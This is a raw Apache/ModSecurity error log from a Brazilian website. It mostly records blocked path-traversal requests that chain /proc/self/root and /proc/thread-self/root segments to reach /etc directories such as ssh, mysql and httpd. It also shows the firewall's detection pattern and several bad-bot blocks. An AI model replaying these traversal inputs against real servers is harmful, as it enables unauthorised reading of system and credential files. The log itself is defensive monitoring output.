https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:30:45.003096 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.243.128:58672] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqpBeyqAr6etmhZHNq81AAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:30:48.535330 2026] [:error] [pid 30077:tid 140411624429312] [client 74.7.243.128:58682] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqpCPu8EFLIOrSqIpsBtAAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:30:49.946308 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.243.128:38484] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqpCeyqAr6etmhZHNq81wAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:31:46.677299 2026] [mime_magic:error] [pid 31803:tid 140411725141760] (70014)End of file found: [client 216.73.216.191:21907] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 10:32:05.741794 2026] [mime_magic:error] [pid 26799:tid 140411557287680] (70014)End of file found: [client 216.73.216.191:20827] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 10:32:54.367637 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.241.31:35054] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqphuyqAr6etmhZHNq9igAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:32:55.650942 2026] [:error] [pid 19507:tid 140411582465792] [client 74.7.241.31:57812] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqph9Y0UrI5A3LftIylGwAAAZM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:33:12.473863 2026] [:error] [pid 17887:tid 140411666392832] [client 74.7.241.31:57828] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqpmAkwaGbbGflqUZAN8wAAAMk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:33:15.168788 2026] [:error] [pid 29882:tid 140411666392832] [client 74.7.241.31:60968] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqpm0zinOy1jxa1j4cTHgAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:33:32.882848 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.228.61:51194] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqprMdf6f5d65gmYZTTOQAAAtA"]
[Wed Mar 18 10:33:32.891199 2026] [:error] [pid 15051:tid 140411607643904] [client 74.7.244.43:47778] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqprCmAPhZkrhU8w4lqmwAAAJA"]
[Wed Mar 18 10:33:36.711285 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.241.31:60980] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqpsOyqAr6etmhZHNq9qgAAAEE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc
[Wed Mar 18 10:34:24.317847 2026] [mime_magic:error] [pid 11816:tid 140411683178240] (70014)End of file found: [client 57.141.18.20:35256] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 10:35:38.899308 2026] [:error] [pid 29882:tid 140411557287680] [client 216.73.216.191:43082] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqqKkzinOy1jxa1j4cToQAAARY"]
[Wed Mar 18 10:35:48.246543 2026] [mime_magic:error] [pid 29882:tid 140411632822016] (70014)End of file found: [client 216.73.216.191:31450] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 10:36:00.395031 2026] [:error] [pid 30077:tid 140411540502272] [client 74.7.241.31:52410] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqqQPu8EFLIOrSqIpsCcgAAAlg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:36:09.026892 2026] [:error] [pid 19507:tid 140411599251200] [client 74.7.241.31:37752] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqqSdY0UrI5A3LftIylhwAAAZE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:38:12.011036 2026] [mime_magic:error] [pid 26799:tid 140411632822016] (70014)End of file found: [client 57.141.18.113:42540] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 10:38:21.733043 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.241.31:49512] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqqzda6ubjKNq_cu4aYSAAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:38:32.786677 2026] [:error] [pid 11816:tid 140411683178240] [client 74.7.244.43:38932] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqq2Ow_le52K8_3pV3eWAAAAgc"]
[Wed Mar 18 10:38:33.318191 2026] [:error] [pid 11816:tid 140411548894976] [client 74.7.228.61:57990] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqq2ew_le52K8_3pV3eXAAAAhc"]
[Wed Mar 18 10:38:52.895457 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.241.31:49526] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqq7OoXxyEfFpUF8f9snwAAAVM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:39:04.577776 2026] [mime_magic:error] [pid 11816:tid 140411641214720] (70014)End of file found: [client 57.141.18.4:44292] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 10:39:34.543107 2026] [:error] [pid 15826:tid 140411725141760] [client 216.73.216.191:38960] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqrFuoXxyEfFpUF8f9stAAAAUI"]
[Wed Mar 18 10:39:39.983095 2026] [:error] [pid 19507:tid 140411733534464] [client 216.73.216.191:31415] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqrG9Y0UrI5A3LftIymYwAAAYE"]
[Wed Mar 18 10:40:01.319498 2026] [:error] [pid 11816:tid 140411741927168] [client 216.73.216.191:30717] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqrMew_le52K8_3pV3elwAAAgA"]
[Wed Mar 18 10:40:19.673703 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.241.31:52078] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqrQ9a6ubjKNq_cu4aY5wAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:40:33.412029 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.241.31:54752] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqrUfu8EFLIOrSqIpsDBQAAAlY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc
[Wed Mar 18 10:40:52.791365 2026] [:error] [pid 15826:tid 140411725141760] [client 216.73.216.191:33088] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqrZOoXxyEfFpUF8f9s0AAAAUI"]
[Wed Mar 18 10:41:03.418578 2026] [:error] [pid 15051:tid 140411582465792] [client 216.73.216.191:30464] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqrbymAPhZkrhU8w4lr3wAAAJM"]
[Wed Mar 18 10:42:31.277910 2026] [mime_magic:error] [pid 26799:tid 140411599251200] (70014)End of file found: [client 57.141.18.56:50616] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 10:42:54.946257 2026] [mime_magic:error] [pid 29882:tid 140411658000128] (70014)End of file found: [client 57.141.18.28:51266] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 10:43:04.602616 2026] [mime_magic:error] [pid 19507:tid 140411607643904] (70014)End of file found: [client 57.141.18.36:51466] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
